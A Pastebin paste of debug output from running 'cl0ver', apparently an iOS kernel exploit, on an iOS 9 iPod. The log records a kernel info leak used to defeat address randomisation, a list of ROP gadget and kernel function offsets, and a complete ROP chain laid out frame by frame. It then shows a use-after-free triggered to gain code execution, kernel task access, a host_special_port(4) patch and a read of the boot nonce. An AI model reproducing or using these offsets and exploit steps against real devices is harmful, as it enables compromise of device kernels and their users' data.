Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- root# /etc/cl0ver/cl0ver
- [*] Checking for config file... [src/lib/offsets.c:180 off_cfg]
- [*] Nope, let's hope the registry has a compatible anchor & vtab... [src/lib/offsets.c:185 off_cfg]
- [*] OS build: 13A404 [src/lib/device.c:102 get_os_version_internal]
- [*] Page size: 0x0000000000001000 [src/lib/uaf_rop.c:113 uaf_rop_stack]
- [*] Allocating ROP stack page at 0x000000000c000000 [src/lib/uaf_rop.c:117 uaf_rop_stack]
- [*] Allocated ROP page at 0x000000000c000000 [src/lib/uaf_rop.c:123 uaf_rop_stack]
- [*] Initializing offsets... [src/lib/offsets.c:257 off_init]
- [*] Checking for offsets cache file... [src/lib/offsets.c:270 off_init]
- [*] Yes, trying to load offsets from cache... [src/lib/offsets.c:276 off_init]
- [*] Successfully loaded offsets from cache, skipping kernel dumping. [src/lib/offsets.c:293 off_init]
- [*] Using info leak to get kernel slide... [src/lib/slide.c:64 get_kernel_slide]
- [*] Dict: [src/lib/slide.c:33 get_kernel_anchor]
- [*] dict[0]: 0x000000d3 [src/lib/slide.c:33 get_kernel_anchor]
- [*] dict[1]: 0x81000002 [src/lib/slide.c:33 get_kernel_anchor]
- [*] dict[2]: 0x08000004 [src/lib/slide.c:33 get_kernel_anchor]
- [*] dict[3]: 0x006c6f6c [src/lib/slide.c:33 get_kernel_anchor]
- [*] dict[4]: 0x84000400 [src/lib/slide.c:33 get_kernel_anchor]
- [*] dict[5]: 0x69696969 [src/lib/slide.c:33 get_kernel_anchor]
- [*] dict[6]: 0x69696969 [src/lib/slide.c:33 get_kernel_anchor]
- [*] Spawning user client / Parsing dictionary... [src/lib/io.c:59 _io_spawn_client]
- [*] Getting IO service handle... [src/lib/io.c:45 _io_get_service]
- [*] Getting IO master port... [src/lib/io.c:30 get_io_master_port]
- [*] Creating dict iterator... [src/lib/io.c:72 _io_iterator]
- [*] Getting next element from iterator... [src/lib/io.c:84 _io_next]
- [*] Releasing user client... [src/lib/io.c:131 _io_release_client]
- [*] Kernel stack: [src/lib/slide.c:44 get_kernel_anchor]
- [*] buf[ 0]: 0x6969696969696969 [src/lib/slide.c:44 get_kernel_anchor]
- [*] buf[ 1]: 0xffffff8019f4a000 [src/lib/slide.c:44 get_kernel_anchor]
- [*] buf[ 2]: 0x00000000ff002bf1 [src/lib/slide.c:44 get_kernel_anchor]
- [*] buf[ 3]: 0xffffff80010d65cc [src/lib/slide.c:44 get_kernel_anchor]
- [*] buf[ 4]: 0xffffff80037e8db4 [src/lib/slide.c:44 get_kernel_anchor]
- [*] buf[ 5]: 0xffffff800211dc00 [src/lib/slide.c:44 get_kernel_anchor]
- [*] buf[ 6]: 0xffffff80010d65a0 [src/lib/slide.c:44 get_kernel_anchor]
- [*] buf[ 7]: 0xffffff801944b950 [src/lib/slide.c:44 get_kernel_anchor]
- [*] buf[ 8]: 0xffffff8019ad4edc [src/lib/slide.c:44 get_kernel_anchor]
- [*] buf[ 9]: 0x0000000000000000 [src/lib/slide.c:44 get_kernel_anchor]
- [*] buf[10]: 0xffffff8019f50a50 [src/lib/slide.c:44 get_kernel_anchor]
- [*] buf[11]: 0xffffff80010d6000 [src/lib/slide.c:44 get_kernel_anchor]
- [*] buf[12]: 0xffffff8019f9ecc8 [src/lib/slide.c:44 get_kernel_anchor]
- [*] buf[13]: 0x0000000000001074 [src/lib/slide.c:44 get_kernel_anchor]
- [*] buf[14]: 0x0000000000000000 [src/lib/slide.c:44 get_kernel_anchor]
- [*] buf[15]: 0xffffff8019f9e050 [src/lib/slide.c:44 get_kernel_anchor]
- [*] Getting anchor address from registry... [src/lib/offsets.c:37 reg_anchor]
- [*] Model: N102AP [src/lib/device.c:34 get_model_internal]
- [*] Got anchor: 0xffffff800454a000 [src/lib/offsets.c:152 off_anchor]
- [*] Kernel slide: 0x0000000015a00000 [src/lib/slide.c:67 get_kernel_slide]
- [*] Offsets: [src/lib/offsets.c:439 off_init]
- [*] gadget_load_x20_x19 = 0xffffff8019a08dec [src/lib/offsets.c:440 off_init]
- [*] gadget_ldp_x9_add_sp_sp_0x10 = 0xffffff801aaf4dbc [src/lib/offsets.c:441 off_init]
- [*] gadget_ldr_x0_sp_0x20_load_x22_x19 = 0xffffff8019ae3880 [src/lib/offsets.c:442 off_init]
- [*] gadget_add_x0_x0_x19_load_x20_x19 = 0xffffff8019add618 [src/lib/offsets.c:443 off_init]
- [*] gadget_blr_x20_load_x22_x19 = 0xffffff801a9eb088 [src/lib/offsets.c:444 off_init]
- [*] gadget_str_x0_x19_load_x20_x19 = 0xffffff8019a29ec0 [src/lib/offsets.c:445 off_init]
- [*] gadget_ldr_x0_x21_load_x24_x19 = 0xffffff8019d027b0 [src/lib/offsets.c:446 off_init]
- [*] gadget_OSUnserializeXML_return = 0xffffff8019df69ec [src/lib/offsets.c:447 off_init]
- [*] frag_mov_x1_x20_blr_x19 = 0xffffff8019a2c128 [src/lib/offsets.c:448 off_init]
- [*] func_ldr_x0_x0 = 0xffffff8019b19810 [src/lib/offsets.c:449 off_init]
- [*] func_current_task = 0xffffff8019a51b4c [src/lib/offsets.c:450 off_init]
- [*] func_ipc_port_copyout_send = 0xffffff8019a1e728 [src/lib/offsets.c:451 off_init]
- [*] func_ipc_port_make_send = 0xffffff8019a1e67c [src/lib/offsets.c:452 off_init]
- [*] data_kernel_task = 0xffffff8019f4a010 [src/lib/offsets.c:453 off_init]
- [*] data_realhost_special = 0xffffff8019fa83f0 [src/lib/offsets.c:454 off_init]
- [*] off_task_itk_self = 0x00000000000000e8 [src/lib/offsets.c:455 off_init]
- [*] off_task_itk_space = 0x00000000000002a0 [src/lib/offsets.c:456 off_init]
- [*] OSUnserializeXML_stack = 0x0000000000000110 [src/lib/offsets.c:457 off_init]
- [*] is_io_service_open_extended_stack = 0x0000000000000120 [src/lib/offsets.c:458 off_init]
- [*] Rop chain: 0x000000000c000000-0x000000000c000340 [src/lib/exploit.c:73 get_kernel_task]
- [*] fp: 0x000000000c000010 [src/lib/exploit.c:76 get_kernel_task]
- [*] lr: 0xffffff801aaf4dbc [src/lib/exploit.c:77 get_kernel_task]
- [*] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
- [*] fp: 0x000000000c000020 [src/lib/exploit.c:76 get_kernel_task]
- [*] lr: 0xffffff801aaf4dbc [src/lib/exploit.c:77 get_kernel_task]
- [*] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
- [*] fp: 0x000000000c000030 [src/lib/exploit.c:76 get_kernel_task]
- [*] lr: 0xffffff801aaf4dbc [src/lib/exploit.c:77 get_kernel_task]
- [*] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
- [*] fp: 0x000000000c000040 [src/lib/exploit.c:76 get_kernel_task]
- [*] lr: 0xffffff801aaf4dbc [src/lib/exploit.c:77 get_kernel_task]
- [*] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
- [*] fp: 0x000000000c000050 [src/lib/exploit.c:76 get_kernel_task]
- [*] lr: 0xffffff801aaf4dbc [src/lib/exploit.c:77 get_kernel_task]
- [*] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
- [*] fp: 0x000000000c000060 [src/lib/exploit.c:76 get_kernel_task]
- [*] lr: 0xffffff801aaf4dbc [src/lib/exploit.c:77 get_kernel_task]
- [*] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
- [*] fp: 0x000000000c000070 [src/lib/exploit.c:76 get_kernel_task]
- [*] lr: 0xffffff801aaf4dbc [src/lib/exploit.c:77 get_kernel_task]
- [*] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
- [*] fp: 0x000000000c000080 [src/lib/exploit.c:76 get_kernel_task]
- [*] lr: 0xffffff801aaf4dbc [src/lib/exploit.c:77 get_kernel_task]
- [*] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
- [*] fp: 0x000000000c000090 [src/lib/exploit.c:76 get_kernel_task]
- [*] lr: 0xffffff801aaf4dbc [src/lib/exploit.c:77 get_kernel_task]
- [*] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
- [*] fp: 0x000000000c0000a0 [src/lib/exploit.c:76 get_kernel_task]
- [*] lr: 0xffffff801aaf4dbc [src/lib/exploit.c:77 get_kernel_task]
- [*] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
- [*] fp: 0x000000000c0000b0 [src/lib/exploit.c:76 get_kernel_task]
- [*] lr: 0xffffff801aaf4dbc [src/lib/exploit.c:77 get_kernel_task]
- [*] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
- [*] fp: 0x000000000c0000c0 [src/lib/exploit.c:76 get_kernel_task]
- [*] lr: 0xffffff801aaf4dbc [src/lib/exploit.c:77 get_kernel_task]
- [*] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
- [*] fp: 0x000000000c0000d0 [src/lib/exploit.c:76 get_kernel_task]
- [*] lr: 0xffffff801aaf4dbc [src/lib/exploit.c:77 get_kernel_task]
- [*] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
- [*] fp: 0x000000000c000100 [src/lib/exploit.c:76 get_kernel_task]
- [*] lr: 0xffffff8019ae3880 [src/lib/exploit.c:77 get_kernel_task]
- [*] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
- [*] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
- [*] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
- [*] 0xfffffffffffffee0 [src/lib/exploit.c:84 get_kernel_task]
- [*] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
- [*] fp: 0x000000000c000120 [src/lib/exploit.c:76 get_kernel_task]
- [*] lr: 0xffffff8019add618 [src/lib/exploit.c:77 get_kernel_task]
- [*] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
- [*] 0x000000000c000330 [src/lib/exploit.c:84 get_kernel_task]
- [*] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
- [*] fp: 0x000000000c000140 [src/lib/exploit.c:76 get_kernel_task]
- [*] lr: 0xffffff8019a29ec0 [src/lib/exploit.c:77 get_kernel_task]
- [*] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
- [*] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
- [*] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
- [*] fp: 0x000000000c000160 [src/lib/exploit.c:76 get_kernel_task]
- [*] lr: 0xffffff8019a08dec [src/lib/exploit.c:77 get_kernel_task]
- [*] 0xffffff8019a51b4c [src/lib/exploit.c:84 get_kernel_task]
- [*] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
- [*] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
- [*] fp: 0x000000000c000190 [src/lib/exploit.c:76 get_kernel_task]
- [*] lr: 0xffffff801a9eb088 [src/lib/exploit.c:77 get_kernel_task]
- [*] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
- [*] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
- [*] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
- [*] 0x00000000000002a0 [src/lib/exploit.c:84 get_kernel_task]
- [*] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
- [*] fp: 0x000000000c0001b0 [src/lib/exploit.c:76 get_kernel_task]
- [*] lr: 0xffffff8019add618 [src/lib/exploit.c:77 get_kernel_task]
- [*] 0xffffff8019b19810 [src/lib/exploit.c:84 get_kernel_task]
- [*] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
- [*] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
- [*] fp: 0x000000000c0001e0 [src/lib/exploit.c:76 get_kernel_task]
- [*] lr: 0xffffff801a9eb088 [src/lib/exploit.c:77 get_kernel_task]
- [*] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
- [*] 0xffffff8019f4a010 [src/lib/exploit.c:84 get_kernel_task]
- [*] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
- [*] 0x000000000c0002b0 [src/lib/exploit.c:84 get_kernel_task]
- [*] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
- [*] fp: 0x000000000c000200 [src/lib/exploit.c:76 get_kernel_task]
- [*] lr: 0xffffff8019a29ec0 [src/lib/exploit.c:77 get_kernel_task]
- [*] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
- [*] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
- [*] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
- [*] fp: 0x000000000c000240 [src/lib/exploit.c:76 get_kernel_task]
- [*] lr: 0xffffff8019d027b0 [src/lib/exploit.c:77 get_kernel_task]
- [*] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
- [*] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
- [*] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
- [*] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
- [*] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
- [*] 0x00000000000000e8 [src/lib/exploit.c:84 get_kernel_task]
- [*] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
- [*] fp: 0x000000000c000260 [src/lib/exploit.c:76 get_kernel_task]
- [*] lr: 0xffffff8019add618 [src/lib/exploit.c:77 get_kernel_task]
- [*] 0xffffff8019b19810 [src/lib/exploit.c:84 get_kernel_task]
- [*] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
- [*] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
- [*] fp: 0x000000000c000290 [src/lib/exploit.c:76 get_kernel_task]
- [*] lr: 0xffffff801a9eb088 [src/lib/exploit.c:77 get_kernel_task]
- [*] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
- [*] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
- [*] 0xffffff8019a1e67c [src/lib/exploit.c:84 get_kernel_task]
- [*] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
- [*] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
- [*] fp: 0x000000000c0002c0 [src/lib/exploit.c:76 get_kernel_task]
- [*] lr: 0xffffff801a9eb088 [src/lib/exploit.c:77 get_kernel_task]
- [*] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
- [*] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
- [*] 0x00000000baadf00d [src/lib/exploit.c:84 get_kernel_task]
- [*] 0xffffff8019a08dec [src/lib/exploit.c:84 get_kernel_task]
- [*] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
- [*] fp: 0x000000000c0002e0 [src/lib/exploit.c:76 get_kernel_task]
- [*] lr: 0xffffff8019a2c128 [src/lib/exploit.c:77 get_kernel_task]
- [*] 0xffffff8019a1e728 [src/lib/exploit.c:84 get_kernel_task]
- [*] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
- [*] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
- [*] fp: 0x000000000c000310 [src/lib/exploit.c:76 get_kernel_task]
- [*] lr: 0xffffff801a9eb088 [src/lib/exploit.c:77 get_kernel_task]
- [*] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
- [*] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
- [*] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
- [*] 0x00000001000d0474 [src/lib/exploit.c:84 get_kernel_task]
- [*] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
- [*] fp: 0x000000000c000330 [src/lib/exploit.c:76 get_kernel_task]
- [*] lr: 0xffffff8019a29ec0 [src/lib/exploit.c:77 get_kernel_task]
- [*] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
- [*] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
- [*] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
- [*] fp: 0x00000000deadbeef [src/lib/exploit.c:76 get_kernel_task]
- [*] lr: 0xffffff8019df69ec [src/lib/exploit.c:77 get_kernel_task]
- [*] Executing ROP chain... [src/lib/uaf_rop.c:131 uaf_rop]
- [*] Using UAF to gain PC control... [src/lib/uaf_rop.c:19 uaf_parse]
- [*] Data: [src/lib/uaf_rop.c:22 uaf_parse]
- [*] data[0]: 0x6fd474b0 [src/lib/uaf_rop.c:22 uaf_parse]
- [*] data[1]: 0x00000001 [src/lib/uaf_rop.c:22 uaf_parse]
- [*] data[2]: 0x00000064 [src/lib/uaf_rop.c:22 uaf_parse]
- [*] data[3]: 0x00000001 [src/lib/uaf_rop.c:22 uaf_parse]
- [*] data[4]: 0x00000000 [src/lib/uaf_rop.c:22 uaf_parse]
- [*] data[5]: 0x00000001 [src/lib/uaf_rop.c:22 uaf_parse]
- [*] data[6]: 0x00000000 [src/lib/uaf_rop.c:22 uaf_parse]
- [*] data[7]: 0x00000000 [src/lib/uaf_rop.c:22 uaf_parse]
- [*] dict_90: [src/lib/uaf_rop.c:99 uaf_parse]
- [*] dict_90[ 0]: 0x000000d3 [src/lib/uaf_rop.c:99 uaf_parse]
- [*] dict_90[ 1]: 0x81000004 [src/lib/uaf_rop.c:99 uaf_parse]
- [*] dict_90[ 2]: 0x08000004 [src/lib/uaf_rop.c:99 uaf_parse]
- [*] dict_90[ 3]: 0x00727473 [src/lib/uaf_rop.c:99 uaf_parse]
- [*] dict_90[ 4]: 0x09000004 [src/lib/uaf_rop.c:99 uaf_parse]
- [*] dict_90[ 5]: 0x00727473 [src/lib/uaf_rop.c:99 uaf_parse]
- [*] dict_90[ 6]: 0x0c000001 [src/lib/uaf_rop.c:99 uaf_parse]
- [*] dict_90[ 7]: 0x0b000001 [src/lib/uaf_rop.c:99 uaf_parse]
- [*] dict_90[ 8]: 0x0c000001 [src/lib/uaf_rop.c:99 uaf_parse]
- [*] dict_90[ 9]: 0x0a000020 [src/lib/uaf_rop.c:99 uaf_parse]
- [*] dict_90[10]: 0x6fd474b0 [src/lib/uaf_rop.c:99 uaf_parse]
- [*] dict_90[11]: 0x00000001 [src/lib/uaf_rop.c:99 uaf_parse]
- [*] dict_90[12]: 0x00000064 [src/lib/uaf_rop.c:99 uaf_parse]
- [*] dict_90[13]: 0x00000001 [src/lib/uaf_rop.c:99 uaf_parse]
- [*] dict_90[14]: 0x00000000 [src/lib/uaf_rop.c:99 uaf_parse]
- [*] dict_90[15]: 0x00000001 [src/lib/uaf_rop.c:99 uaf_parse]
- [*] dict_90[16]: 0x00000000 [src/lib/uaf_rop.c:99 uaf_parse]
- [*] dict_90[17]: 0x00000000 [src/lib/uaf_rop.c:99 uaf_parse]
- [*] dict_90[18]: 0x08000004 [src/lib/uaf_rop.c:99 uaf_parse]
- [*] dict_90[19]: 0x00666572 [src/lib/uaf_rop.c:99 uaf_parse]
- [*] dict_90[20]: 0x8c000002 [src/lib/uaf_rop.c:99 uaf_parse]
- [*] Spawning user client / Parsing dictionary... [src/lib/io.c:59 _io_spawn_client]
- [*] TODO: fix ROP to return 0 [src/lib/exploit.c:100 get_kernel_task]
- [*] Got kernel task [src/lib/exploit.c:107 get_kernel_task]
- [*] Installing host_special_port(4) patch... [src/lib/exploit.c:114 patch_host_special_port_4]
- [*] Kernel task address: 0xffffff800092bb60 [src/lib/exploit.c:130 patch_host_special_port_4]
- [*] Kernel task port address: 0xffffff800091ab80 [src/lib/exploit.c:139 patch_host_special_port_4]
- [*] Successfully installed patch [src/lib/exploit.c:168 patch_host_special_port_4]
- Alessiopod:~ root# /nonceok
- nvram: Error setting variable - 'com.apple.System.boot-nonce': (iokit/common) general error
- com.apple.System.boot-nonce 0x2d2463fe66833fd8
- boot-args
- auto-boot true
- backlight-level 1535
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement